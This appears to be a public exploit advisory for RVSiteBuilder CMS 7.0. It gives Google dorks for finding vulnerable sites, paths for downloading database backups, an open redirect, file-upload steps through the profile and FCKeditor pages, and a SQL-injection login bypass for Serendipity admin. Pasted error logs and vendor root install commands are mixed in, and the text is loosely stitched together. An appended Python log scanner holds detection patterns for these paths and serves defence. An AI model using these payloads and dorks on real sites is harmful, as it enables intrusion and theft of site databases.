#################################################################################################
# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities
Vulnerabilities are =>
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com + dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/ + twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types :
CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101
#################################################################################################
# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************
# Vulnerabilities and Exploits include =>
************************************
1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls
#################################################################################################
# Description : RVglobalsoft is the leading software solution for hosting providers.
***********************************************************************
# Google Dork 1 : inurl:''/rvsindex.php/''
# Google Dork 2 : inurl:''/rvsindex.php?/user/login''
# Google Dork 3 : inurl:''/rvsindex.php/user/register''
# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js
#################################################################################################
# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
*****************************************************************************************
TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]

FOR CPANEL =>
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

FOR DIRECTADMIN =>
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/FrontController.php on line 257

Strict Standards: Declaration of SGL_MDB2::query() should be compatible with MDB2_Driver_Common::query($query, $types = NULL, $result_class = true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82

Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() should not be called statically, assuming $this from incompatible context in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60

Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS/public_html/rvscommonfunc.php on line 174

Please contact your host provider ssh as root to server and run.
Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20
#################################################################################################
PATH => TARGET/ComponentAndUserFramework.php

Please edit /home2/DOMAINADDRESS/public_html/php.ini change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

# PATH for View Homepage => TARGET/rvsindex.php
#################################################################################################
# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
**************************************************************
TARGET/admin or this is the Admin Panel way => /rvsindex.php?/user/login/
# PATH Admin Panel Login WordPress => TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1
# PATH Admin Panel Login Joomla => TARGET/administrator
# PATH Admin Panel Login osCommerce => TARGET/admin
# PATH Admin Panel Login OpenCart => TARGET/admin

Note : Some RVSiteBuilder websites use WordPress and Joomla, but all files belong to the RVSiteBuilder and RVGlobalSoft software. It is a totally weird vulnerability. They have paths like TARGET/blogweb or TARGET/osc, but some sites give this error. Sometimes it asks for a username and password.
Please contact your provider edit file php.ini change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache
#################################################################################################
# PATH for Uploaded Documents => TARGET/documents/
#################################################################################################
# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] =>
TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/
# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources
#################################################################################################
# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/
#################################################################################################
# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/
#################################################################################################
# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo
#################################################################################################
# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG
#################################################################################################
# PATH Learn Version => TARGET/js/scriptaculous/VERSION
#################################################################################################
# PATH for Optimizer => TARGET/optimizer.php

Please edit /home2/DOMAIN/public_html/php.ini change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
#################################################################################################
# Other Paths that give the same error =>
#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php

Please edit /home2/DOMAIN/public_html/php.ini change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
#################################################################################################
#QuickForm tutorial example - *Enter your name:
#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html
#################################################################################################
#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html
#################################################################################################
#{foreach:aFaqData,key,aValue} {if:aValue.category_name}
#/themes/rvtheme/faqweb/viewFaqWeb.html
#################################################################################################
#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html
#################################################################################################
# Testing forms
# /themes/default/testForms.php
#################################################################################################
# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability
# TARGET/login => It automatically redirects to this URL => /rvsindex.php?/user/login/action/login
# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADDRESS
#################################################################################################
# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html
#################################################################################################
#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html
#################################################################################################
#RVTheme Admin Area and Users usable Login Paths =>
#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/
#################################################################################################
#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt
#################################################################################################
#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js
#################################################################################################
Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]
/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/
#################################################################################################
# RevSiteBuilder SQL Injection Vulnerability =>
*****************************************
#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
#################################################################################################
# What You See Is What You Get [ WYSIWYG ] Exploiter =>
*******************************************************
# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit
# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html
# Example Site => /images/....
# Allowed File Extensions => .txt .png .gif .jpg .xml
# Sometimes the WYSIWYG editor gives this error when trying to upload a file to the server

Please contact your host provider ssh as root to server and run.

For cpanel
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

For directadmin
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

Tutorial '' How to download RVsiteBuilder package file manually ? ''

For cPanel
--------------------
SSH to your cPanel server as root and run command

cd /usr/local/cpanel/whostmgr/docroot/cgi/
rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/
rm -f rvsitebuilderinstaller.tar
wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar
tar -xvf rvsitebuilderinstaller.tar
rm -f rvsitebuilderinstaller.tar
mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
tar -xvf scriptdownloadpackage.tar
/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php

Once the manual file download is complete, please follow the instructions at this link.
https://www.rvsitebuilder.com/installation/
--------------------
For DirectAdmin
--------------------
SSH to your cPanel server as root and run command

cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
tar -xvf scriptdownloadpackage.tar
php scriptdownloadpackage.php

Once the manual file download is complete, please follow the instructions at this link.
https://www.rvsitebuilder.com/installation/

Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/
Reference => rvskin.com/rvlogin/rvloginssh
#################################################################################################
# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability
# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql
# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql
# Example Site DB Backup View => archive.is/Demkr
#################################################################################################
1) Register yourself to the site
TARGET/rvsindex.php?/user/register/
It says => You have successfully been registered. Please check your email for confirmation of your password.
Note : Confirm your registration in order to proceed. Sometimes RVSiteBuilder and RVGlobalsoft give you a new password, or you choose your password during registration.
Pay attention : When you register choose your nickname carefully because it is important.
It says => Activation is successfully. Please login.

2) Login to the User Interface => TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area
/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this => TARGET/rvsindex.php?/user/account/action/viewProfile/
Edit these Values
Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)
It says => Your profile details have been successfully updated
PATH : /themes/rvtheme/images/YOURNICKNAME.
Note : Your chosen nickname is important during registration. Upload your html or txt file but do not put like this .yournickname.html Just . [ dot ] is important here.
You will see your index on that site.
#################################################################################################
# Serendipity RevSiteBuilder Blog Administration
# /blogweb/serendipity_admin.php
# Username : '=''or'
# Password : '=''or'
# You can use for both of them as '' admin '' '' admin ''
# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true
# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal
# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration
# To mitigate this issue please upgrade at least to version 2.0.2:
# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
# Please note that a newer version might already be available.
#################################################################################################
How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ]
Check every folder and limit with .htaccess

cPanel

ssh to your server as root and install the plugin 'RVglobalsoft manager' by running the following shell command:

cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh

Login to WHM as root.
Go to WHM > Plugins > and run RVglobalsoft manager then follow the simple install process.
Configure the plugin for your panel.
It's all done! RVsitebuilder is ready to use for all your users.

DirectAdmin

1. ssh to your server as "root" and install the plugin 'RVglobalsoft manager' by running the following shell command:

cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh

2. For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)

2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl

2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod

3. Open the file 'directadmin.conf' located at /usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15

4. Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow the simple install process.

5. Login to DirectAdmin as "admin" and configure the plugin on your panel.

RVsitebuilder in DirectAdmin plugins cannot configure hosting plans, but you can set plans at user level with RVsitebuilder Admin.
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'
#################################################################################################
RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/
RVSiteBuilder Installation => rvsitebuilder.com/installation/
RVSiteBuilder and RVGlobalSoft Tutorials => rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#################################################################################################
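
Added example (not part of the original advisory and not RVSiteBuilder code): an access-log check a hosting provider could run to spot requests for the database backup, FCKeditor connector, login redir and Serendipity admin paths listed in the sections above. The combined log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# (rule name, regex on the decoded request target, allowed methods, allowed statuses)
# Paths are the ones listed in the advisory; rule names are this example's own.
RULES = [
    ("db-backup-served",
     re.compile(r"/(rvsUtf8Backup/)?rvs(DbBackup|PageData)\.sql(\?|$)", re.I),
     None, {"200", "206"}),
    ("fckeditor-connector",
     re.compile(r"/wysiwyg/fckeditor/editor/filemanager/connectors/", re.I), None, None),
    ("login-redir-param", re.compile(r"/user/login/redir/", re.I), None, None),
    ("serendipity-admin-post",
     re.compile(r"/serendipity_admin\.php(\?|$)", re.I), {"POST"}, None),
    ("version-or-test-file-served",
     re.compile(r"/(version\.txt|themes/default/testForms\.php|"
                r"scripts/rvslib/Pear/quickFormTest\.php)(\?|$)", re.I),
     None, {"200"}),
]

def scan(lines):
    """Return one finding per (log line, rule) match; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m["target"])  # so %2E-style encodings still match
        for name, pattern, methods, statuses in RULES:
            if methods and m["method"] not in methods:
                continue
            if statuses and m["status"] not in statuses:
                continue  # e.g. a 404 for the .sql file means it was not served
            if pattern.search(target):
                findings.append({"ip": m["ip"], "rule": name,
                                 "status": m["status"], "target": target})
    return findings

def by_client(findings):
    """Group matched rule names per client IP so a probing sequence stands out."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["ip"], set()).add(f["rule"])
    return grouped

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2019:10:01:02 +0000] "GET /rvsUtf8Backup/rvsDbBackup.sql HTTP/1.1" 200 48213 "-" "-"',
    '203.0.113.7 - - [14/Feb/2019:10:01:05 +0000] "GET /rvsUtf8Backup/rvsPageData%2Esql HTTP/1.1" 200 9120 "-" "-"',
    '203.0.113.7 - - [14/Feb/2019:10:01:09 +0000] "GET /wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 3011 "-" "-"',
    '198.51.100.20 - - [14/Feb/2019:10:02:00 +0000] "GET /rvsDbBackup.sql HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.20 - - [14/Feb/2019:10:02:11 +0000] "POST /blogweb/serendipity_admin.php HTTP/1.1" 200 2210 "-" "-"',
    '192.0.2.44 - - [14/Feb/2019:10:03:00 +0000] "GET /rvsindex.php?/user/login/ HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.44 - - [14/Feb/2019:10:03:30 +0000] "GET /rvsindex.php?/user/login/redir/PLACEHOLDER HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, rules in sorted(by_client(scan(SAMPLE_LOG)).items()):
        print(ip, sorted(rules))
```

A "db-backup-served" hit means the .sql file was actually returned to the client, so the backup should be moved out of the web root and its contents treated as disclosed.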